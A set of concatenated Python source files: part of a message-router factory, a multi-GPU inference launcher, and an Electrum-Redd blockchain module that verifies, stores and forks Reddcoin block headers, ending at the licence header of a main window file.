threading.Thread(target=notify, args=(self._notifier, 30)).start()
@property
def message_parsed_batch_router(self) -> MessageRouter:
"""
Return the MessageRouter that works with MessageBatch (created lazily on first access).
"""
if self._message_parsed_batch_router is None:
self._message_parsed_batch_router = self.message_parsed_batch_router_class(self.connection,
self.rabbit_mq_configuration,
self.message_router_configuration
)
return self._message_parsed_batch_router
@property
def message_raw_batch_router(self) -> MessageRouter:
"""
Return the MessageRouter that works with RawMessageBatch (created lazily on first access).
"""
if self._message_raw_batch_router is None:
self._message_raw_batch_router = self.message_raw_batch_router_class(self.connection,
self.rabbit_mq_configuration,
self.message_router_configuration)
return self._message_raw_batch_router
@property
def event_batch_router(self) -> MessageRouter:
"""
Return the MessageRouter that works with EventBatch (created lazily on first access).
"""
if self._event_batch_router is None:
self._event_batch_router = self.event_batch_router_class(self.connection,
self.rabbit_mq_configuration,
self.message_router_configuration)
return self._event_batch_router
@property
def grpc_router(self) -> GrpcRouter:
if self._grpc_router is None:
self._grpc_router = self.grpc_router_class(self.grpc_router_configuration)
return self._grpc_router
def close(self):
logger.info('Closing Common Factory')
if self._message_raw_batch_router is not None:
try:
self._message_raw_batch_router.close()
except Exception:
logger.exception('Error during closing Message Router (Message Raw Batch)')
if self._message_parsed_batch_router is not None:
try:
self._message_parsed_batch_router.close()
except Exception:
logger.exception('Error during closing Message Router (Message Parsed Batch)')
if self._event_batch_router is not None:
try:
self._event_batch_router.close()
except Exception:
logger.exception('Error during closing Message Router (Event Batch)')
if self._grpc_router is not None:
try:
self._grpc_router.close()
except Exception:
logger.exception('Error during closing gRPC Router')
self._notifier.set()
if self.connection is not None and self.connection.is_open:
self.connection.close()
@staticmethod
def read_configuration(filepath):
with open(filepath, 'r') as file:
config_json = file.read()
config_json_expanded = os.path.expandvars(config_json)
config_dict = json.loads(config_json_expanded)
return config_dict
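# Illustrative note: os.path.expandvars() above substitutes environment
# variables before the JSON is parsed, so a file containing, e.g.,
#   {"host": "${RABBITMQ_HOST}", "username": "${RABBITMQ_USER}"}
# resolves to the concrete values of those variables at read time.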
def create_cradle_configuration(self) -> CradleConfiguration:
return CradleConfiguration(**self.read_configuration(self._path_to_cradle_configuration()))
def create_custom_configuration(self) -> dict:
return self.read_configuration(self._path_to_custom_configuration())
def _create_rabbit_mq_configuration(self) -> RabbitMQConfiguration:
lock = Lock()
try:
lock.acquire()
if not hasattr(self, 'rabbit_mq_configuration'):
config_dict = self.read_configuration(self._path_to_rabbit_mq_configuration())
self.rabbit_mq_configuration = RabbitMQConfiguration(**config_dict)
finally:
lock.release()
return self.rabbit_mq_configuration
def _create_message_router_configuration(self) -> MessageRouterConfiguration:
lock = Lock()
with lock:
if not hasattr(self, 'message_router_configuration'):
config_dict = self.read_configuration(self._path_to_message_router_configuration())
self.message_router_configuration = MessageRouterConfiguration(**config_dict)
return self.message_router_configuration
def _create_grpc_router_configuration(self) -> GrpcRouterConfiguration:
lock = Lock()
try:
lock.acquire()
if not hasattr(self, 'grpc_router_configuration'):
config_dict = self.read_configuration(self._path_to_grpc_router_configuration())
self.grpc_router_configuration = GrpcRouterConfiguration(**config_dict)
finally:
lock.release()
return self.grpc_router_configuration
@abstractmethod
def _path_to_rabbit_mq_configuration(self) -> str:
pass
@abstractmethod
def _path_to_message_router_configuration(self) -> str:
pass
@abstractmethod
def _path_to_grpc_router_configuration(self) -> str:
pass
@abstractmethod
def _path_to_cradle_configuration(self) -> str:
pass
@abstractmethod
def _path_to_custom_configuration(self) -> str:
pass
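# --- Illustrative sketch (hypothetical, not part of this module) ---
# A concrete factory only needs to point the abstract _path_to_* hooks at the
# configuration files; the base class does the rest in __init__.
class DirectoryCommonFactory(AbstractCommonFactory):

    def __init__(self, config_dir: str) -> None:
        self._config_dir = config_dir  # must be set before the base __init__ reads the configs
        super().__init__()

    def _path_to_rabbit_mq_configuration(self) -> str:
        return os.path.join(self._config_dir, 'rabbitMQ.json')

    def _path_to_message_router_configuration(self) -> str:
        return os.path.join(self._config_dir, 'mq.json')

    def _path_to_grpc_router_configuration(self) -> str:
        return os.path.join(self._config_dir, 'grpc.json')

    def _path_to_cradle_configuration(self) -> str:
        return os.path.join(self._config_dir, 'cradle.json')

    def _path_to_custom_configuration(self) -> str:
        return os.path.join(self._config_dir, 'custom.json')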
|
multi_inference_20200804111841.py
|
# coding=utf-8
import os
import cv2
import sys
import pdb
import subprocess
import multiprocessing
import inference_utils
import common
def single_process(index, task, gpu):
print(("任务%d处理%d张图片" % (index, len(task))))
# 写文件
filename = inference_utils.dump_testfile(task, index)
out_str = subprocess.check_output(["python", file, "--gpuid=%s" % str(gpu), "--img_list=%s" % filename, "--out_dir=%s" % out_dir, "--batch_size=%d" % batch_size])
print(("任务%d处理完毕!" % (index)))
if "__main__" == __name__:
gpu_list = [1,1,2,2,3,3,4,4,5,5,6,6,6,7,7,7]
file = "tools/multi_process_inference/inference.py"
img_dir = '/home/songbai.xb/workspace/projects/TAO/data/TAO/frames/train/'
out_dir = './tmp/file/train_nonms_tta/'
batch_size = 1
# Parse the image directory
img_list = common.load_filepaths(img_dir, suffix=('.jpg', '.png', '.jpeg'), recursive=True)
#names = demo_utils.parse_testfile(testfile)
print(f"{len(img_list)} images in total")
# Split the images into one task per GPU entry
task_num = len(gpu_list)
tasks = inference_utils.chunks(img_list, task_num)
# Create worker processes
processes=list()
for idx, (task, gpu) in enumerate(zip(tasks, gpu_list)):
processes.append(multiprocessing.Process(target=single_process,args=(idx, task, gpu)))
for process in processes:
process.start()
for process in processes:
process.join()
|
blockchain.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@ecdsa.org
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import threading
import time
from typing import Optional, Dict, Mapping, Sequence
import certifi
from . import util
from .bitcoin import hash_encode, int_to_hex, rev_hex
from .crypto import sha256d
from . import constants
from .util import bfh, bh2u
from .simple_config import SimpleConfig
from .logging import get_logger, Logger
from .kgw import KGW
from .version import ELECTRUM_VERSION
# On Android urllib doesn't have certs by default and need to be explicitly loaded.
if 'ANDROID_DATA' in os.environ:
os.environ['SSL_CERT_FILE'] = certifi.where()
try:
import scrypt
getPoWHash = lambda x: scrypt.hash(x, x, N=1024, r=1, p=1, buflen=32)
except ImportError:
util.print_msg("Warning: package scrypt not available; synchronization could be very slow")
from .scrypt import scrypt_1024_1_1_80 as getPoWHash
_logger = get_logger(__name__)
HEADER_SIZE = 80 # bytes
MAX_TARGET = 0x00000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
MAX_NBITS = 0x1e0FFFFF
# Start checking POW after block 44877
# http://live.reddcoin.com/block/4253e7618d40aded00d11b664e874245ae74d55b976f4ac087d1a9db2f5f3cda
CHECK_POW_FROM_NTIME = 1394048078
class MissingHeader(Exception):
pass
class InvalidHeader(Exception):
pass
def serialize_header(header_dict: dict) -> str:
s = int_to_hex(header_dict['version'], 4) \
+ rev_hex(header_dict['prev_block_hash']) \
+ rev_hex(header_dict['merkle_root']) \
+ int_to_hex(int(header_dict['timestamp']), 4) \
+ int_to_hex(int(header_dict['bits']), 4) \
+ int_to_hex(int(header_dict['nonce']), 4)
return s
def deserialize_header(s: bytes, height: int) -> dict:
if not s:
raise InvalidHeader('Invalid header: {}'.format(s))
if len(s) != HEADER_SIZE:
raise InvalidHeader('Invalid header length: {}'.format(len(s)))
hex_to_int = lambda s: int.from_bytes(s, byteorder='little')
h = {}
h['version'] = hex_to_int(s[0:4])
h['prev_block_hash'] = hash_encode(s[4:36])
h['merkle_root'] = hash_encode(s[36:68])
h['timestamp'] = hex_to_int(s[68:72])
h['bits'] = hex_to_int(s[72:76])
h['nonce'] = hex_to_int(s[76:80])
h['block_height'] = height
return h
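# Illustrative note: serialize_header()/deserialize_header() follow the standard
# 80-byte block header layout, in order:
#   version (4 bytes) | prev_block_hash (32) | merkle_root (32)
#   | timestamp (4) | bits (4) | nonce (4)
# Multi-byte integers are little-endian on the wire, and the two hashes are
# stored byte-reversed relative to their usual hex display (hence rev_hex /
# hash_encode above).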
def hash_header(header: dict) -> str:
if header is None:
return '0' * 64
if header.get('prev_block_hash') is None:
header['prev_block_hash'] = '00'*32
return hash_raw_header(serialize_header(header))
def hash_raw_header(header: str) -> str:
return hash_encode(sha256d(bfh(header)))
def pow_hash_header(header):
return hash_encode(getPoWHash(bfh(serialize_header(header))))
# key: blockhash hex at forkpoint
# the chain at some key is the best chain that includes the given hash
blockchains = {} # type: Dict[str, Blockchain]
blockchains_lock = threading.RLock() # lock order: take this last; so after Blockchain.lock
def read_blockchains(config: 'SimpleConfig'):
best_chain = Blockchain(config=config,
forkpoint=0,
parent=None,
forkpoint_hash=constants.net.GENESIS,
prev_hash=None)
blockchains[constants.net.GENESIS] = best_chain
# consistency checks
if best_chain.height() > constants.net.max_checkpoint():
header_after_cp = best_chain.read_header(constants.net.max_checkpoint()+1)
if not header_after_cp or not best_chain.can_connect(header_after_cp, check_height=False):
_logger.info("[blockchain] deleting best chain. cannot connect header after last cp to last cp.")
os.unlink(best_chain.path())
best_chain.update_size()
# forks
fdir = os.path.join(util.get_headers_dir(config), 'forks')
util.make_dir(fdir)
# files are named as: fork2_{forkpoint}_{prev_hash}_{first_hash}
l = filter(lambda x: x.startswith('fork2_') and '.' not in x, os.listdir(fdir))
l = sorted(l, key=lambda x: int(x.split('_')[1])) # sort by forkpoint
def delete_chain(filename, reason):
_logger.info(f"[blockchain] deleting chain {filename}: {reason}")
os.unlink(os.path.join(fdir, filename))
def instantiate_chain(filename):
__, forkpoint, prev_hash, first_hash = filename.split('_')
forkpoint = int(forkpoint)
prev_hash = (64-len(prev_hash)) * "0" + prev_hash # left-pad with zeroes
first_hash = (64-len(first_hash)) * "0" + first_hash
# forks below the max checkpoint are not allowed
if forkpoint <= constants.net.max_checkpoint():
delete_chain(filename, "deleting fork below max checkpoint")
return
# find parent (sorting by forkpoint guarantees it's already instantiated)
for parent in blockchains.values():
if parent.check_hash(forkpoint - 1, prev_hash):
break
else:
delete_chain(filename, "cannot find parent for chain")
return
b = Blockchain(config=config,
forkpoint=forkpoint,
parent=parent,
forkpoint_hash=first_hash,
prev_hash=prev_hash)
# consistency checks
h = b.read_header(b.forkpoint)
if first_hash != hash_header(h):
delete_chain(filename, "incorrect first hash for chain")
return
if not b.parent.can_connect(h, check_height=False):
delete_chain(filename, "cannot connect chain to parent")
return
chain_id = b.get_id()
assert first_hash == chain_id, (first_hash, chain_id)
blockchains[chain_id] = b
for filename in l:
instantiate_chain(filename)
def get_best_chain() -> 'Blockchain':
return blockchains[constants.net.GENESIS]
# block hash -> chain work; up to and including that block
_CHAINWORK_CACHE = {
"0000000000000000000000000000000000000000000000000000000000000000": 0, # virtual block at height -1
} # type: Dict[str, int]
def downloading_headers():
b = get_best_chain()
return b.download_headers
def init_headers_file_for_best_chain():
b = get_best_chain()
filename = b.path()
length = HEADER_SIZE * len(constants.net.CHECKPOINTS) * 2016
def reporthook(count, block_size, total_size):
global start_time, current_time
if count == 0:
start_time = time.time()
current_time = 0
return
duration = time.time() - start_time
progress_size = int(count * block_size)
speed = int(progress_size / (1024 * duration))
percent = min((count * block_size * 100 / total_size),100)
if (percent==100) or (time.time() - current_time > 1):
_logger.info(f"header download ... {percent:.2f}%, size {progress_size / (1024 * 1024):.2f} MB, {speed} KB/s, {duration:.2f} seconds passed")
current_time = time.time()
b.download_headers_pc = percent
def download_thread():
try:
import urllib.request, socket
socket.setdefaulttimeout(60 * 5)
_logger.info(f"downloading {constants.net.HEADERS_URL}")
opener = urllib.request.build_opener()
opener.addheaders = [('User-Agent', 'Electrum-Redd/' + ELECTRUM_VERSION)]
urllib.request.install_opener(opener)
urllib.request.urlretrieve(constants.net.HEADERS_URL, filename + '.tmp', reporthook)
os.rename(filename + '.tmp', filename)
_logger.info("done.")
except Exception as e:
_logger.error(f"download failed. Reason {e} while creating file {filename}")
open(filename, 'wb+').close()
with b.lock:
b.update_size()
b.download_headers = False
if not os.path.exists(filename) or os.path.getsize(filename) < length:
b.download_headers = True
b.download_headers_pc = 0
t = threading.Thread(target=download_thread)
t.daemon = True
t.start()
with b.lock:
b.update_size()
b.download_headers_pc = 100
# with open(filename, 'wb') as f:
# if length > 0:
# f.seek(length - 1)
# f.write(b'\x00')
# util.ensure_sparse_file(filename)
# with b.lock:
# b.update_size()
class Blockchain(Logger):
"""
Manages blockchain headers and their verification
"""
def __init__(self, config: SimpleConfig, forkpoint: int, parent: Optional['Blockchain'],
forkpoint_hash: str, prev_hash: Optional[str]):
assert isinstance(forkpoint_hash, str) and len(forkpoint_hash) == 64, forkpoint_hash
assert (prev_hash is None) or (isinstance(prev_hash, str) and len(prev_hash) == 64), prev_hash
# assert (parent is None) == (forkpoint == 0)
if 0 < forkpoint <= constants.net.max_checkpoint():
raise Exception(f"cannot fork below max checkpoint. forkpoint: {forkpoint}")
Logger.__init__(self)
self.config = config
self.forkpoint = forkpoint # height of first header
self.parent = parent
self._forkpoint_hash = forkpoint_hash # blockhash at forkpoint. "first hash"
self._prev_hash = prev_hash # blockhash immediately before forkpoint
self.lock = threading.RLock()
self.update_size()
self.kgw = KGW()
self.cache_headers = []
self.cache_kgw_size = 7 * 24 * 60
self.chunk_size = 2016
self.check_pow_from_ntime = 1394048078
self.download_headers = False
self.download_headers_pc = 0
def with_lock(func):
def func_wrapper(self, *args, **kwargs):
with self.lock:
return func(self, *args, **kwargs)
return func_wrapper
@property
def checkpoints(self):
return constants.net.CHECKPOINTS
def get_max_child(self) -> Optional[int]:
children = self.get_direct_children()
return max([x.forkpoint for x in children]) if children else None
def get_max_forkpoint(self) -> int:
"""Returns the max height where there is a fork
related to this chain.
"""
mc = self.get_max_child()
return mc if mc is not None else self.forkpoint
def get_direct_children(self) -> Sequence['Blockchain']:
with blockchains_lock:
return list(filter(lambda y: y.parent==self, blockchains.values()))
def get_parent_heights(self) -> Mapping['Blockchain', int]:
"""Returns map: (parent chain -> height of last common block)"""
with self.lock, blockchains_lock:
result = {self: self.height()}
chain = self
while True:
parent = chain.parent
if parent is None: break
result[parent] = chain.forkpoint - 1
chain = parent
return result
def get_height_of_last_common_block_with_chain(self, other_chain: 'Blockchain') -> int:
last_common_block_height = 0
our_parents = self.get_parent_heights()
their_parents = other_chain.get_parent_heights()
for chain in our_parents:
if chain in their_parents:
h = min(our_parents[chain], their_parents[chain])
last_common_block_height = max(last_common_block_height, h)
return last_common_block_height
@with_lock
def get_branch_size(self) -> int:
return self.height() - self.get_max_forkpoint() + 1
def get_name(self) -> str:
return self.get_hash(self.get_max_forkpoint()).lstrip('0')[0:10]
def check_header(self, header: dict) -> bool:
header_hash = hash_header(header)
height = header.get('block_height')
return self.check_hash(height, header_hash)
def check_hash(self, height: int, header_hash: str) -> bool:
"""Returns whether the hash of the block at given height
is the given hash.
"""
assert isinstance(header_hash, str) and len(header_hash) == 64, header_hash # hex
try:
return header_hash == self.get_hash(height)
except Exception:
return False
def fork(parent, header: dict) -> 'Blockchain':
if not parent.can_connect(header, check_height=False):
raise Exception("forking header does not connect to parent chain")
forkpoint = header.get('block_height')
self = Blockchain(config=parent.config,
forkpoint=forkpoint,
parent=parent,
forkpoint_hash=hash_header(header),
prev_hash=parent.get_hash(forkpoint-1))
self.assert_headers_file_available(parent.path())
open(self.path(), 'w+').close()
self.save_header(header)
# put into global dict. note that in some cases
# save_header might have already put it there but that's OK
chain_id = self.get_id()
with blockchains_lock:
blockchains[chain_id] = self
return self
@with_lock
def height(self) -> int:
return self.forkpoint + self.size() - 1
@with_lock
def size(self) -> int:
return self._size
@with_lock
def update_size(self) -> None:
p = self.path()
self._size = os.path.getsize(p)//HEADER_SIZE if os.path.exists(p) else 0
@classmethod
def verify_header(cls, header: dict, prev_header: str, bits: int, target: int, expected_header_hash: str=None) -> None:
if header.get('timestamp') < CHECK_POW_FROM_NTIME:
return
prev_hash = hash_header(prev_header)
_hash = hash_header(header)
height = header.get('block_height')
if expected_header_hash and expected_header_hash != _hash:
raise Exception("hash mismatches with expected: {} vs {}".format(expected_header_hash, _hash))
if prev_hash != header.get('prev_block_hash'):
raise Exception("prev hash mismatch: %s vs %s" % (prev_hash, header.get('prev_block_hash')))
if constants.net.TESTNET:
return
if bits != header.get('bits') and (height <= 260799 or height >= 270800 + (7 * 24 * 60)): # TODO fix the target calc around the posv switch
raise Exception("bits mismatch: %s vs %s" % (bits, header.get('bits')))
if height <= 260799:
_powhash = pow_hash_header(header)
if int('0x'+_powhash, 16) >= target:
raise Exception(f"insufficient proof of work: {int('0x'+_powhash, 16)} vs target {target}")
def verify_chunk(self, index: int, data: bytes) -> None:
num = len(data) // HEADER_SIZE
start_height = index * 2016
headers = [deserialize_header(data[i*HEADER_SIZE:(i+1)*HEADER_SIZE], start_height + i) for i in range(num)]
# get preceding headers to use in KGW
if len(self.cache_headers) == 0:
prev_chain = [self.read_header(x) for x in range(max(0, start_height - self.cache_kgw_size), start_height)]
else:
prev_chain = self.cache_headers
prev_header = prev_chain[-1] if len(prev_chain) > 0 else None
chain_target = self.kgw.get_chain_target(prev_chain, headers)
for i, header in enumerate(headers):
height = header.get('block_height')
if height <= self.height():
prev_header = header
continue
bits, target = chain_target[i]
self.verify_header(header, prev_header, bits, target)
prev_header = header
self.cache_headers = prev_chain + headers
if len(self.cache_headers) > self.cache_kgw_size:
self.cache_headers = self.cache_headers[-self.cache_kgw_size:]
@with_lock
def path(self):
d = util.get_headers_dir(self.config)
if self.parent is None:
filename = 'blockchain_headers'
else:
assert self.forkpoint > 0, self.forkpoint
prev_hash = self._prev_hash.lstrip('0')
first_hash = self._forkpoint_hash.lstrip('0')
basename = f'fork2_{self.forkpoint}_{prev_hash}_{first_hash}'
filename = os.path.join('forks', basename)
return os.path.join(d, filename)
@with_lock
def save_chunk(self, index: int, chunk: bytes):
assert index >= 0, index
chunk_within_checkpoint_region = index < len(self.checkpoints)
# chunks in checkpoint region are the responsibility of the 'main chain'
if chunk_within_checkpoint_region and self.parent is not None:
main_chain = get_best_chain()
main_chain.save_chunk(index, chunk)
return
delta_height = (index * 2016 - self.forkpoint)
delta_bytes = delta_height * HEADER_SIZE
# if this chunk contains our forkpoint, only save the part after forkpoint
# (the part before is the responsibility of the parent)
if delta_bytes < 0:
chunk = chunk[-delta_bytes:]
delta_bytes = 0
truncate = not chunk_within_checkpoint_region
self.write(chunk, delta_bytes, truncate)
self.swap_with_parent()
def swap_with_parent(self) -> None:
with self.lock, blockchains_lock:
# do the swap; possibly multiple ones
cnt = 0
while True:
old_parent = self.parent
if not self._swap_with_parent():
break
# make sure we are making progress
cnt += 1
if cnt > len(blockchains):
raise Exception(f'swapping fork with parent too many times: {cnt}')
# we might have become the parent of some of our former siblings
for old_sibling in old_parent.get_direct_children():
if self.check_hash(old_sibling.forkpoint - 1, old_sibling._prev_hash):
old_sibling.parent = self
def _swap_with_parent(self) -> bool:
"""Check if this chain became stronger than its parent, and swap
the underlying files if so. The Blockchain instances will keep
'containing' the same headers, but their ids change and so
they will be stored in different files."""
if self.parent is None:
return False
if self.parent.get_chainwork() >= self.get_chainwork():
return False
self.logger.info(f"swapping {self.forkpoint} {self.parent.forkpoint}")
parent_branch_size = self.parent.height() - self.forkpoint + 1
forkpoint = self.forkpoint # type: Optional[int]
parent = self.parent # type: Optional[Blockchain]
child_old_id = self.get_id()
parent_old_id = parent.get_id()
# swap files
# child takes parent's name
# parent's new name will be something new (not child's old name)
self.assert_headers_file_available(self.path())
child_old_name = self.path()
with open(self.path(), 'rb') as f:
my_data = f.read()
self.assert_headers_file_available(parent.path())
assert forkpoint > parent.forkpoint, (f"forkpoint of parent chain ({parent.forkpoint}) "
f"should be at lower height than children's ({forkpoint})")
with open(parent.path(), 'rb') as f:
f.seek((forkpoint - parent.forkpoint)*HEADER_SIZE)
parent_data = f.read(parent_branch_size*HEADER_SIZE)
self.write(parent_data, 0)
parent.write(my_data, (forkpoint - parent.forkpoint)*HEADER_SIZE)
# swap parameters
self.parent, parent.parent = parent.parent, self # type: Optional[Blockchain], Optional[Blockchain]
self.forkpoint, parent.forkpoint = parent.forkpoint, self.forkpoint
self._forkpoint_hash, parent._forkpoint_hash = parent._forkpoint_hash, hash_raw_header(bh2u(parent_data[:HEADER_SIZE]))
self._prev_hash, parent._prev_hash = parent._prev_hash, self._prev_hash
# parent's new name
os.replace(child_old_name, parent.path())
self.update_size()
parent.update_size()
# update pointers
blockchains.pop(child_old_id, None)
blockchains.pop(parent_old_id, None)
blockchains[self.get_id()] = self
blockchains[parent.get_id()] = parent
return True
def get_id(self) -> str:
return self._forkpoint_hash
def assert_headers_file_available(self, path):
if os.path.exists(path):
return
elif not os.path.exists(util.get_headers_dir(self.config)):
raise FileNotFoundError('Electrum headers_dir does not exist. Was it deleted while running?')
else:
raise FileNotFoundError('Cannot find headers file but headers_dir is there. Should be at {}'.format(path))
@with_lock
def write(self, data: bytes, offset: int, truncate: bool=True) -> None:
filename = self.path()
self.assert_headers_file_available(filename)
with open(filename, 'rb+') as f:
if truncate and offset != self._size * HEADER_SIZE:
f.seek(offset)
f.truncate()
f.seek(offset)
f.write(data)
f.flush()
os.fsync(f.fileno())
self.update_size()
@with_lock
def save_header(self, header: dict) -> None:
delta = header.get('block_height') - self.forkpoint
data = bfh(serialize_header(header))
# headers are only _appended_ to the end:
assert delta == self.size(), (delta, self.size())
assert len(data) == HEADER_SIZE
self.write(data, delta*HEADER_SIZE)
self.swap_with_parent()
@with_lock
def read_header(self, height: int) -> Optional[dict]:
if height < 0:
return
if height < self.forkpoint:
return self.parent.read_header(height)
if height > self.height():
return
delta = height - self.forkpoint
name = self.path()
self.assert_headers_file_available(name)
with open(name, 'rb') as f:
f.seek(delta * HEADER_SIZE)
h = f.read(HEADER_SIZE)
if len(h) < HEADER_SIZE:
raise Exception('Expected to read a full header. This was only {} bytes'.format(len(h)))
if h == bytes([0])*HEADER_SIZE:
return None
return deserialize_header(h, height)
def header_at_tip(self) -> Optional[dict]:
"""Return latest header."""
height = self.height()
return self.read_header(height)
def is_tip_stale(self) -> bool:
STALE_DELAY = 8 * 60 * 60 # in seconds
header = self.header_at_tip()
if not header:
return True
# note: We check the timestamp only in the latest header.
# The Bitcoin consensus has a lot of leeway here:
# - needs to be greater than the median of the timestamps of the past 11 blocks, and
# - up to at most 2 hours into the future compared to local clock
# so there is ~2 hours of leeway in either direction
if header['timestamp'] + STALE_DELAY < time.time():
return True
return False
def get_hash(self, height: int) -> str:
def is_height_checkpoint():
within_cp_range = height <= constants.net.max_checkpoint()
at_chunk_boundary = (height+1) % 2016 == 0
return within_cp_range and at_chunk_boundary
if height == -1:
return '0000000000000000000000000000000000000000000000000000000000000000'
elif height == 0:
return constants.net.GENESIS
elif is_height_checkpoint():
index = height // 2016
h, t, _ = self.checkpoints[index]
return h
else:
header = self.read_header(height)
if header is None:
raise MissingHeader(height)
return hash_header(header)
def get_timestamp(self, height):
if height < len(self.checkpoints) * 2016 and (height+1) % 2016 == 0:
index = height // 2016
_, _, ts = self.checkpoints[index]
return ts
return self.read_header(height).get('timestamp')
def get_target(self, index: int, prev_chain = {}) -> int:
# compute target from chunk x, used in chunk x+1
if constants.net.TESTNET:
return 0, 0
if index == -1:
return MAX_NBITS, MAX_TARGET
if index < len(self.checkpoints):
h, t, _ = self.checkpoints[index]
return t
# new target
prev_chain = [self.read_header(x) for x in range((0, index - self.cache_kgw_size)[index - self.cache_kgw_size > 0], index)]
return self.kgw.get_target(prev_chain)
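# Compact "nBits" encoding helpers: one exponent byte plus a three-byte mantissa,
# as used in block headers. bits_to_target() expands the compact form to a 256-bit
# integer and target_to_bits() packs it back; for example, 0x1d00ffff expands to
# 0xffff << (8 * (0x1d - 3)).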
@classmethod
def bits_to_target(cls, bits: int) -> int:
bitsN = (bits >> 24) & 0xff
if not (0x03 <= bitsN <= 0x1d):
raise Exception("First part of bits should be in [0x03, 0x1d]")
bitsBase = bits & 0xffffff
if not (0x8000 <= bitsBase <= 0x7fffff):
raise Exception("Second part of bits should be in [0x8000, 0x7fffff]")
return bitsBase << (8 * (bitsN-3))
@classmethod
def target_to_bits(cls, target: int) -> int:
c = ("%064x" % target)[2:]
while c[:2] == '00' and len(c) > 6:
c = c[2:]
bitsN, bitsBase = len(c) // 2, int.from_bytes(bfh(c[:6]), byteorder='big')
if bitsBase >= 0x800000:
bitsN += 1
bitsBase >>= 8
return bitsN << 24 | bitsBase
def chainwork_of_header_at_height(self, height: int) -> int:
"""work done by single header at given height"""
chunk_idx = height // 2016 - 1
bits, target = self.get_target(chunk_idx)
work = ((2 ** 256 - target - 1) // (target + 1)) + 1
return work
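# Cumulative proof-of-work up to `height` (the tip if None). Work is accumulated
# per 2016-block chunk and memoized in _CHAINWORK_CACHE, keyed by the hash of the
# last header of each chunk, so repeated calls only pay for the newest partial
# chunk. On testnet the height itself is returned instead.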
@with_lock
def get_chainwork(self, height=None) -> int:
if height is None:
height = max(0, self.height())
if constants.net.TESTNET:
# On testnet/regtest, difficulty works somewhat differently.
# It's out of scope to properly implement that.
return height
last_retarget = height // 2016 * 2016 - 1
cached_height = last_retarget
while _CHAINWORK_CACHE.get(self.get_hash(cached_height)) is None:
if cached_height <= -1:
break
cached_height -= 2016
assert cached_height >= -1, cached_height
running_total = _CHAINWORK_CACHE[self.get_hash(cached_height)]
while cached_height < last_retarget:
cached_height += 2016
work_in_single_header = self.chainwork_of_header_at_height(cached_height)
work_in_chunk = 2016 * work_in_single_header
running_total += work_in_chunk
_CHAINWORK_CACHE[self.get_hash(cached_height)] = running_total
cached_height += 2016
work_in_single_header = self.chainwork_of_header_at_height(cached_height)
work_in_last_partial_chunk = (height % 2016 + 1) * work_in_single_header
return running_total + work_in_last_partial_chunk
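# True if `header` can be appended to this chain's tip: the height must follow the
# current tip (unless check_height is False), prev_block_hash must match, and the
# header must verify against the expected bits/target.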
def can_connect(self, header: dict, check_height: bool=True) -> bool:
if header is None:
return False
height = header['block_height']
if check_height and self.height() != height - 1:
return False
if height == 0:
return hash_header(header) == constants.net.GENESIS
prev_header = self.read_header(height - 1)
if not prev_header:
return False
try:
prev_hash = self.get_hash(height - 1)
except:
return False
if prev_hash != header.get('prev_block_hash'):
return False
try:
bits, target = self.get_target(height)
except MissingHeader:
return False
try:
self.verify_header(header, prev_header, bits, target)
except BaseException as e:
return False
return True
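# Verify a server-supplied chunk of headers (hex-encoded) and persist it; returns
# False and logs the error instead of raising if verification fails.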
def connect_chunk(self, idx: int, hexdata: str) -> bool:
assert idx >= 0, idx
try:
data = bfh(hexdata)
self.verify_chunk(idx, data)
self.save_chunk(idx, data)
return True
except BaseException as e:
self.logger.info(f'verify_chunk idx {idx} failed: {repr(e)}')
return False
def get_checkpoints(self):
# for each chunk, store the hash of the last block and the target after the chunk
cp = []
n = self.height() // 2016
for index in range(n):
h = self.get_hash((index+1) * 2016 -1)
target = self.get_target(index)
# Reddcoin: also store the timestamp of the last block
tstamp = self.get_timestamp((index+1) * 2016 - 1)
cp.append((h, target, tstamp))
return cp
def check_header(header: dict) -> Optional[Blockchain]:
"""Returns any Blockchain that contains header, or None."""
if type(header) is not dict:
return None
with blockchains_lock: chains = list(blockchains.values())
for b in chains:
if b.check_header(header):
return b
return None
def can_connect(header: dict) -> Optional[Blockchain]:
"""Returns the Blockchain that has a tip that directly links up
with header, or None.
"""
with blockchains_lock: chains = list(blockchains.values())
for b in chains:
if b.can_connect(header):
return b
return None
def get_chains_that_contain_header(height: int, header_hash: str) -> Sequence[Blockchain]:
"""Returns a list of Blockchains that contain header, best chain first."""
with blockchains_lock: chains = list(blockchains.values())
chains = [chain for chain in chains
if chain.check_hash(height=height, header_hash=header_hash)]
chains = sorted(chains, key=lambda x: x.get_chainwork(), reverse=True)
return chains
|
main_window.py
|
#!/usr/bin/env python3
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
